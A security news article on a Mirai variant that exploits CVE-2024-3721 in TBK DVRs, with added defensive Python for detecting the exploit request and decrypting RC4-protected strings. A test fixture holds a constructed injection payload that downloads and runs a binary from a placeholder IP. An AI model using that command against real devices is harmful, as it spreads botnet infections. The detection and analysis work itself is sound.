
Kaspersky researchers have uncovered a fresh wave of attacks exploiting CVE-2024-3721 to deploy a revamped variant of the notorious Mirai botnet, and this time the targets are TBK DVR-based surveillance systems.
The attack begins with a POST request to the vulnerable TBK DVR endpoint (/device.rsp) whose body carries a Linux shell command:
The one-liner downloads and executes an ARM32 binary outright, with no architecture probing: the affected DVR models are known to run on that architecture, so the attacker can skip the usual survey step and trade generality for speed.
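Because the exploit rides on a single HTTP request to a fixed endpoint, the natural place to catch it is at the network edge. The following is an added example, not code from the original article or from Kaspersky, showing how an inline inspector might flag such a request. The sample requests are constructed for illustration and are not the payload reported by Kaspersky; the parameter name "opt", the addresses and the file name are assumptions, since the source names only the endpoint.

```python
import re
from typing import Dict, List

# Constructed sample requests (not captured traffic). The bodies are illustrative
# only; "opt", the hosts and "arm32.bin" are assumptions, not indicators from the report.
SAMPLE_REQUESTS: List[bytes] = [
    # Ordinary-looking form POST to the same endpoint (assumed benign usage)
    b"POST /device.rsp HTTP/1.1\r\nHost: 192.0.2.10\r\n\r\nopt=user&cmd=list",
    # Command-injection style body: fetch an ARM32 binary and run it without probing
    b"POST /device.rsp HTTP/1.1\r\nHost: 192.0.2.10\r\n\r\n"
    b"opt=$(cd /tmp; wget http://198.51.100.7/arm32.bin; chmod +x arm32.bin; ./arm32.bin)",
    # Unrelated request, should never be flagged
    b"GET /index.html HTTP/1.1\r\nHost: 192.0.2.10\r\n\r\n",
]

# Shell control constructs that have no business inside a DVR form parameter.
# A single '&' is deliberately excluded: it is the normal form-field separator.
SHELL_META = re.compile(r";|\|\||&&|\$\(|`")
# Typical "download then execute" tokens seen in IoT bot droppers.
DOWNLOAD_OR_EXEC = re.compile(r"\b(wget|curl|tftp|ftpget|chmod)\b|(?:^|[\s;|&(])\./")


def parse_http_request(raw: bytes) -> Dict[str, str]:
    """Split a raw HTTP/1.x request into method, path and body; headers are ignored."""
    head, _, body = raw.partition(b"\r\n\r\n")
    request_line = head.split(b"\r\n", 1)[0].decode("latin-1", "replace")
    parts = request_line.split(" ")
    method = parts[0] if parts else ""
    path = parts[1].split("?", 1)[0] if len(parts) > 1 else ""
    return {"method": method, "path": path, "body": body.decode("latin-1", "replace")}


def assess_request(raw: bytes) -> Dict[str, object]:
    """Flag a POST to /device.rsp only when both indicator classes are present."""
    req = parse_http_request(raw)
    reasons: List[str] = []
    if req["method"] == "POST" and req["path"] == "/device.rsp":
        if SHELL_META.search(req["body"]):
            reasons.append("shell control characters in POST body")
        if DOWNLOAD_OR_EXEC.search(req["body"]):
            reasons.append("download/execute tokens in POST body")
    # Requiring both keeps legitimate DVR traffic to the endpoint from alerting.
    return {"path": req["path"], "suspicious": len(reasons) == 2, "reasons": reasons}


def scan(requests: List[bytes]) -> List[Dict[str, object]]:
    """Return the assessments that were flagged as suspicious."""
    return [r for r in (assess_request(x) for x in requests) if r["suspicious"]]


if __name__ == "__main__":
    for hit in scan(SAMPLE_REQUESTS):
        print(hit)
```

The two-indicator rule is the practitioner's caveat: the endpoint itself is legitimate device functionality, so the path alone is not an indicator of compromise, and the decision has to rest on the body content.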
“Typically, bot infections involve shell scripts that initially survey the target machine… However, in this case… the reconnaissance stage is unnecessary,” explains Kaspersky.
While this bot is based on the Mirai source code released nearly a decade ago, it includes several modern twists:
- RC4-encrypted strings using XOR-obfuscated keys
- Anti-virtualization checks for VMware and QEMU
- Process inspection via /proc/[pid]/cmdline
- Execution directory validation
These additions are meant to make analysis harder and minimize detection in sandboxed environments.
“The data decryption routine in this variant is implemented as a simple RC4 algorithm… The decrypted RC4 key is used to decrypt the strings,” the researchers state.
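The string-protection scheme described above (an XOR-masked RC4 key, then RC4 over each string) is simple enough to reimplement for analysis. The block below is an added example and not Kaspersky's code or the malware's: it shows a plain RC4 routine, the two-stage key recovery, and decryption of a constructed string table. The key, the XOR mask (0x5A) and the sample strings are assumptions chosen to mirror the checks the article lists, not values extracted from the sample.

```python
from typing import List, Tuple


def rc4(key: bytes, data: bytes) -> bytes:
    """Plain RC4 (key-scheduling plus PRGA). Encrypting and decrypting are the same operation."""
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out = bytearray()
    i = j = 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(byte ^ S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def xor_mask(blob: bytes, mask: int) -> bytes:
    """Single-byte XOR, used here to hide the RC4 key in the binary (mask is an assumption)."""
    return bytes(b ^ mask for b in blob)


def decrypt_strings(obfuscated_key: bytes, key_mask: int, table: List[bytes]) -> List[str]:
    """Stage 1: XOR the stored key blob back into the real RC4 key.
    Stage 2: RC4-decrypt every entry of the string table with that key."""
    key = xor_mask(obfuscated_key, key_mask)
    return [rc4(key, ct).decode("latin-1") for ct in table]


def build_sample_table() -> Tuple[bytes, int, List[bytes], List[str]]:
    """Constructed sample, NOT data from the real sample: key, mask and strings are assumed."""
    key = b"example-rc4-key"          # assumption
    key_mask = 0x5A                   # assumption
    plaintexts = ["/proc/%d/cmdline", "VMware", "QEMU"]  # mirrors the checks the article lists
    table = [rc4(key, s.encode("latin-1")) for s in plaintexts]
    return xor_mask(key, key_mask), key_mask, table, plaintexts


if __name__ == "__main__":
    obf_key, mask, table, _ = build_sample_table()
    for s in decrypt_strings(obf_key, mask, table):
        print(s)
```

When working from a real binary, the blob and mask come from the decryption routine the disassembler shows, and the table from the data section it references; the order of operations (unmask the key first, then RC4 each string) is the part the quoted description fixes.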
According to Kaspersky’s telemetry data, the majority of infected systems are located in:
- China
- India
- Egypt
- Ukraine
- Russia
- Turkey
- Brazil
With more than 50,000 publicly exposed DVR devices identified via public scans, the pool of reachable targets is significant.
Once deployed, the malware connects to a command-and-control (C2) server and awaits instructions — most likely for Distributed Denial-of-Service (DDoS) attacks or other mass exploitation activities.
“The main goal of such bots is to carry out attacks that overwhelm websites and services (DDoS attacks),” Kaspersky warns.
Notably, the malware does not establish persistence on many devices: a reboot removes the infection. With bots constantly scanning the internet, however, reinfection is never far away.